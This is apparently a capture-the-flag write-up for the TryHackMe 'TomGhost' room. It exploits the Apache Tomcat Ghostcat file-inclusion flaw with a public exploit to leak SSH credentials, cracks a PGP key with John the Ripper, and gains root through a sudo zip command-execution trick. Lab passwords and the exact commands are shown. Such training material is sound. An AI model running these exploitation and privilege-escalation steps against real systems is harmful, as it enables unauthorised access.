TomGhost

Ghostcat

The Apache Ghostcat is a File Inclusion Vulnerability. It allows an Attacker to Read Files such as Configuration Files or any Tomcat Directory Files. In addition if an User is abe to Upload Files an Attacker can Upload the File containing Malicious JSP Code and then include the Uploaded file by Exploiting Ghostcat Vulnerability resulting in RCE.

Vulnerable Apache Versions: 6.x - 7.x - 8.x - 9.x

Used Exploit: EDB-ID: 48143
Reading: /opt/tomcat/webapps/ROOT/WEB-INF/web.xml using the Automated Exploit.
Username - Password: skyfuck:8730281lkjlkjdqlksalks

attacker@machine:~$ python2 48143.py 10.10.29.49 -p 8009
<?xml version="1.0" encoding="UTF-8"?>
<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee"
    ...
  <display-name>Welcome to Tomcat</display-name>
  <description>
    Welcome to GhostCat
    skyfuck:8730281lkjlkjdqlksalks
  </description>

</web-app>

Decrypting PGP

Using SSH Credentials to Login: skyfuck:8730281lkjlkjdqlksalks

skyfuck@ubuntu:~$ id
uid=1002(skyfuck) gid=1002(skyfuck) groups=1002(skyfuck)

Found PGP Key: tryhackme.asc PGP Encrypted File: credentials.pgp

skyfuck@ubuntu:~$ ls -l
-rw-rw-r-- 1 skyfuck skyfuck  394 Mar 10  2020 credential.pgp
-rw-rw-r-- 1 skyfuck skyfuck 5144 Mar 10  2020 tryhackme.asc

JOHN

The PGP Key: tryhackme.asc is Password Protected we can use John to Brute-Force it.
But first we need to Transform the PGP Key into John Readable Format. We can do that with gpg2john.

Transform
Brute-Force

gpg2john tryhackme.asc > hash

john wordlist=<WordList> <Hash>

Password: alexandru

Loaded 1 password hash (gpg, OpenPGP / GnuPG Secret Key [32/64])
alexandru        (tryhackme)

Viewing PGP Contents

Importing - Decrypting PGP File: credentials.pgp
Username - Password: merlin:asuyusdoiuqoilkda312j31k2j123j1g23g12k3g12kj3gk12jg3k12j3kj123j

IMPORT
DECRYPT

gpg --import tryhackme.asc

gpg: key 8F3DA3DEC6707170: "tryhackme <stuxnet@tryhackme.com>" not changed
gpg: key 8F3DA3DEC6707170: secret key imported
gpg: key 8F3DA3DEC6707170: "tryhackme <stuxnet@tryhackme.com>" not changed
gpg: Total number processed: 2
gpg:              unchanged: 2
gpg:       secret keys read: 1
gpg:   secret keys imported: 1 

gpg --decrypt credential.pgp

gpg: WARNING: cipher algorithm CAST5 not found in recipient preferences
gpg: encrypted with 1024-bit ELG key, ID 61E104A66184FBCC, created 2020-03-11
      "tryhackme <stuxnet@tryhackme.com>"
merlin:asuyusdoiuqoilkda312j31k2j123j1g23g12k3g12kj3gk12jg3k12j3kj123j 

Privilege Escalation

Using SSH Credentials to Login: merlin:asuyusdoiuqoilkda312j31k2j123j1g23g12k3g12kj3gk12jg3k12j3kj123j

merlin@ubuntu:~$ id
uid=1000(merlin) gid=1000(merlin) groups=1000(merlin),4(adm),24(cdrom),30(dip),46(plugdev),114(lpadmin),115(sambashare)

The User merlin can run: /usr/bin/zip as Root

merlin@ubuntu:~$ sudo -l
Matching Defaults entries for merlin on ubuntu:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User merlin may run the following commands on ubuntu:
    (root : root) NOPASSWD: /usr/bin/zip

Using /usr/bin/zip to Escalate Privileges.

merlin@ubuntu:~$ TF=$(mktemp -u)
merlin@ubuntu:~$ sudo /usr/bin/zip $TF /etc/hosts -T -TT 'bash #'

root@ubuntu:~$ id
uid=0(root) gid=0(root) groups=0(root)
root@ubuntu:~$ whoami
root

Ghostcat​

Decrypting PGP​

JOHN​

Viewing PGP Contents​

Privilege Escalation​

Ghostcat

Decrypting PGP

JOHN

Viewing PGP Contents

Privilege Escalation